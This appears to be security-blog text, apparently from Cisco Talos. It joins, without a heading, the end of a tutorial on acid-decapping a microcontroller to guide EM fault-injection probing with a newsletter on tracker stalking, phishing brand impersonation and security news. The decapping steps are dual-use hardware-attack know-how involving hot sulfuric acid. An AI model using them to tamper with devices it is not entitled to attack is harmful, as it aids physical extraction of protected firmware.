· Sulfuric acid, 96% · A heat source in the form of a hot air station · A crocodile clip “helping hands” · A squirt bottle with acetone · A PE pipette · A waste container.
To begin, the device under attack is fixed in the clip, and a small drop of acid was applied with the pipette in the package center.
Figure 3 - Applying sulfuric acid
The device was then heated using the hot air station set to 200°C and a moderate air flow of around 40%. The aim of this process is to slowly dissolve the packaging epoxy. The device was heated until some fuming was observed from the drop and stopped before any bubbling would occur. If the acid gets hot enough to produce bubbles, the material will form a hard carbonized “cake” which will be problematic to remove. Unfortunately, this has been a problem before.
After the acid visibly darkened, which should take around 1 minute +- 50%, the heating was stopped, and the device was allowed to cool down somewhat. Then, the acid was washed off with acetone into the waste container. The device then was dried off with hot air to remove moisture.
The process was then repeated multiple times, with each iteration removing a bit of the packaging material. This was captured in the following series of images (more steps were taken than is presented here):
Figure 4 - Time lapse of decapping process
A stack of dice slowly emerged from the package: the larger one is the microcontroller itself, and the smaller one is the serial Flash memory holding all the programmed code and data. Unfortunately, the current process does not preserve the bond wires, rendering the device inoperable. Its operation was not required in our case. This could possibly be mitigated by using a 98% acid and anhydrous acetone – something to attempt in the future.
Measurements
The end result of the decapping process is pictured below.
Figure 5 - End result of decapping
Using a graphics editor, it is possible to take measurements in pixels of the package, the die, and the die positioning. This came out to be the following:
· Package size 1835x1835 pixels (measured) = 20x20 mm (known from the datasheet) · Pixels per mm: 91.75 · Die size 366x366 pixels (measured) = 4x4mm (computed) · Die offset from bottom left: 745x745 pixels (measured) = 8.12x8.12mm (computed)
The obtained numbers are immediately useful to program the EM probe motion restricted to the die area only. To find out how much experiment time this could save, let’s compute the areas: 4x4 = 16 mm2 for the die itself, and 20x20 = 400 mm2 for the whole package. This is 25 times decrease in the area and thus the experiment time.
Another approach that could avoid the decapping process is moving the probe in a spiral fashion, starting from the package center and moving outwards. This is of course possible to implement. However, the challenge here is the possibility of the two dice getting packaged side-to-side instead of being stacked like in this example – this would severely decrease the gain from this approach. Given the decapping only takes no more than 1-2 hours including cleanup, this was deemed well worth the information gained – and the die pictures obtained.
Conclusion
I hope you enjoyed this brief tutorial. Again, please take caution when using sulfuric acid or any other corrosive agents. Please dispose of waste materials responsibly. The world of hardware hacking offers many opportunities for discovery. We’ll continue to post guides and methodologies in future posts. Until then, you can follow the team on Twitter, Mastodon, LinkedIn, or Instagram for the latest in exploit techniques and security patches.
Since the advent of products like the Tile and Apple AirTag, both used to keep track of easily lost items like wallets, keys and purses, bad actors and criminals have found ways to abuse them.
These adversaries can range from criminals just looking to do something illegal for a range of reasons, but maybe just looking to steal a physical object, to just a jealous or suspicious spouse or partner who wants to keep tags on their significant other.
Apple and other manufacturers who make these devices have since taken several steps to curb the abuse of these devices and make them more secure. Most recently, Google and Apple announced new alerts that would hit Android and iOS devices and alert users that their devices’ location is being connected to any location-tracking device.
“With this new capability, users will now get an ‘[Item] Found Moving With You’ alert on their device if an unknown Bluetooth tracking device is seen moving with them over time, regardless of the platform the device is paired with,” Apple stated in its announcement.
Companies Motorola, Jio and Eufy also announced that they would be adhering to these new standards and should release compliant products soon.
Certainly, products like the AirTag and Samsung trackers that these companies have direct control over will now be more secure, and hopefully less ripe for abuse by a bad actor, but it’s far from a total solution to the problem that these types of products pose.
As I’ve pointed out in the past with security cameras and any other range of internet-connected devices, online stores are filled with these types of products, promising to track users’ personal items with an app so they don’t lose common household items like their phones, wallets and keys.
Amazon has countless listings under “location tag” for a range of AirTag-like products made by unknown manufacturers. Some of these products are slim enough to fit right into the credit card pocket of a wallet or purse, and others are smaller than the average AirTag and even advertise that they can remain hidden inside a car.
I admittedly haven’t been able to dive into these individual devices, but some of them come with their own third-party apps, which come with their own set of security caveats and completely take it out of platform developers’ hands.
There are also other “find my device”-type services that pose additional security concerns outside of just buying a small tag. Android’s new, enhanced “Find My Device” network is a crowdsourced solution to help users potentially find their lost devices, similar to iOS’ Find My network.
The Find My Device network works by using other Android devices to silently relay the registered device’s approximate location, even if the device being searched for is offline or turned off. In the wrong hands, there are a range of ways that can be abused on its own.
So, rather than relying on developers and manufacturers to make these services more secure, I have a few tips for how to use AirTag-like devices safely, if you really can’t come up with a better solution for not losing your keys.
Check for suspicious tracking devices. On iOS, this means opening the “Find My” app and navigating to Items > Items Detected Near You. Any unfamiliar AirTags will be listed here. On Android, you can do the same thing by going to Settings > Safety & Emergency > Unknown Tracker Alerts > Scan Now.
Remove yourself from any “Sharing Groups” unless it’s a trusted contact in your phone using the Find My app on iOS.
If location tracking is your primary concern (especially for parents and their children) using the Find My app on iOS and Android is generally a more secure option than trusting a third-party app downloaded from the app store or relying on a Bluetooth connection.
Manage individual apps’ settings to ensure only the services that *really* need to track your device’s physical location are using it. (Ex., you probably don’t need Facebook tracking that information.)
Since AirTags are connected to your Apple ID, ensure that login is secured with multi-factor authentication (MFA) or using a passkey.
The one big thing
Cisco recently developed and released a new feature to detect brand impersonation in emails when adversaries pretend to be a legitimate corporation. Threat actors employ a variety of techniques to embed brand logos within emails. One simple method involves inserting words associated with the brand into the HTML source of the email. New data from Talos found that popular brands like PayPal, Microsoft, NortonLifeLock and McAfee are among some of the most-impersonated brands in these types of phishing emails.
Why do I care?
Brand impersonation could happen on many online platforms, including social media, websites, emails and mobile applications. This type of threat exploits the familiarity and legitimacy of popular brand logos to solicit sensitive information from victims. In the context of email security, brand impersonation is commonly observed in phishing emails. Threat actors want to deceive their victims into giving up their credentials or other sensitive information by abusing the popularity of well-known brands.
So now what?
Well-known brands can protect themselves from this type of threat through asset protection as well. Domain names can be registered with various extensions to thwart threat actors attempting to use similar domains for malicious purposes. The other crucial step brands can take is to conceal their information from WHOIS records via privacy protection. And users who want to learn more about Cisco Secure Email Threat Defense's new brand impersonation detection tools can visit this site.
Top security headlines of the week
Adversaries have been quietly exploiting the backbone of cellular communications to track Americans’ location for years, according to a U.S. Cybersecurity and Infrastructure Security Agency (CISA). The official broke ranks with their agency and reportedly shared this information with the Federal Communications Commission (FCC). The official said that attackers have used vulnerabilities in the SS7 protocol to steal location data, monitor voice and text messages, and deliver spyware. Other targets have received text messages containing fake news or disinformation. SS7 is the protocol used across the globe that routes text messages and calls to different devices but has often been a target for attackers. In the past, other vulnerabilities in SS7 have been used to gain access to telecommunications providers’ networks. In their written comments to the FCC, the official said that these vulnerabilities are the “tip of the proverbial iceberg” of SS7-related exploits used against U.S. citizens. (404 Media, The Economist)
The FBI once again seized the main site belonging to BreachForums, a popular platform for buying and selling stolen personal information. Last year, international law enforcement agencies took down a previous version of the cybercrime site and arrested its administrator, but the new pages quickly emerged, using three different domains since the last disruption. American law enforcement agencies also took control of the forum’s official Telegram account, and a channel belonging to the newest BreachForums administrator, “Baphomet.” However, the FBI has yet to publicly state anything about the takedown or any potential arrests. BreachForums isn’t expected to be gone for long, as another admin named “ShinyHunters” claims the site will be back with a new Onion domain soon. ShinyHunters claims they’ve retried access to the seized clearnet domain for BreachForums, though they did not provide specific methods. BreachForums is infamous for being a site where attackers can buy and sell stolen data, offer their hacking services or share recent TTPs. (TechCruch,HackRead)
The U.S. Department of Justice charged three North Koreans with crimes related to impersonating others to obtain remote employment in the U.S., which in turn generated funding for North Korea’s military. The three men, and another U.S. citizen, were charged with what the DOJ called “staggering fraud” in which they secured illicit work with several U.S. companies and government agencies using fraudulent identities from 60 real Americans. The U.S. citizen was allegedly placed laptops belonging to U.S. companies at various residences so the North Koreans could hide their true location. North Korean state-sponsored actors have used these types of tactics for years, often relying on social media networks like LinkedIn to fake their personal information and obtain jobs or steal sensitive information from companies. More than 300 companies may have been affected, with the perpetrators earning more than $6.8 million, most of which was used to “raise revenue for the North Korean government and its illicit nuclear program,” according to the DOJ. (ABC News, Bloomberg)
Gergana Karadzhova-Dangela from Cisco Talos Incident Response will participate in a panel on “Using ECSF to Reduce the Cybersecurity Workforce and Skills Gap in the EU.” Karadzhova-Dangela participated in the creation of the EU cybersecurity framework, and will discuss how Cisco has used it for several of its internal initiatives as a way to recruit and hire new talent.
Bill Largent from Talos' Strategic Communications team will be giving our annual "State of Cybersecurity" talk at Cisco Live on Tuesday, June 4 at 11 a.m. Pacific time. Jaeson Schultz from Talos Outreach will have a talk of his own on Thursday, June 6 at 8:30 a.m. Pacific, and there will be several Talos IR-specific lightning talks at the Cisco Secure booth throughout the conference.
Gergana Karadzhova-Dangela from Cisco Talos Incident Response will highlight the primordial importance of actionable incident response documentation for the overall response readiness of an organization. During this talk, she will share commonly observed mistakes when writing IR documentation and ways to avoid them. She will draw on her experiences as a responder who works with customers during proactive activities and actual cybersecurity breaches.
Most prevalent malware files from Talos telemetry over the past week